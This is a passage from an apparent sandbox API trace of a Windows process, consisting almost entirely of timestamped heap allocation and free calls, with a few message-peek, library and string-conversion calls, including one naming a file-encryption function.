hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.241] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.241] FreeLibrary (hLibModule=0x772d0000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0095.241] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.242] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.243] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.243] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0095.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0095.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0095.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0095.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.393] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0095.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0095.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0095.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0095.396] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0095.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0095.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0095.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0095.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0095.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca478, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0095.399] CloseHandle (hObject=0x258) returned 1 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0095.400] FreeLibrary (hLibModule=0x772d0000) returned 1 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0095.400] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0095.400] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0095.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2490 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0095.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca028 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0095.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.403] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0095.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 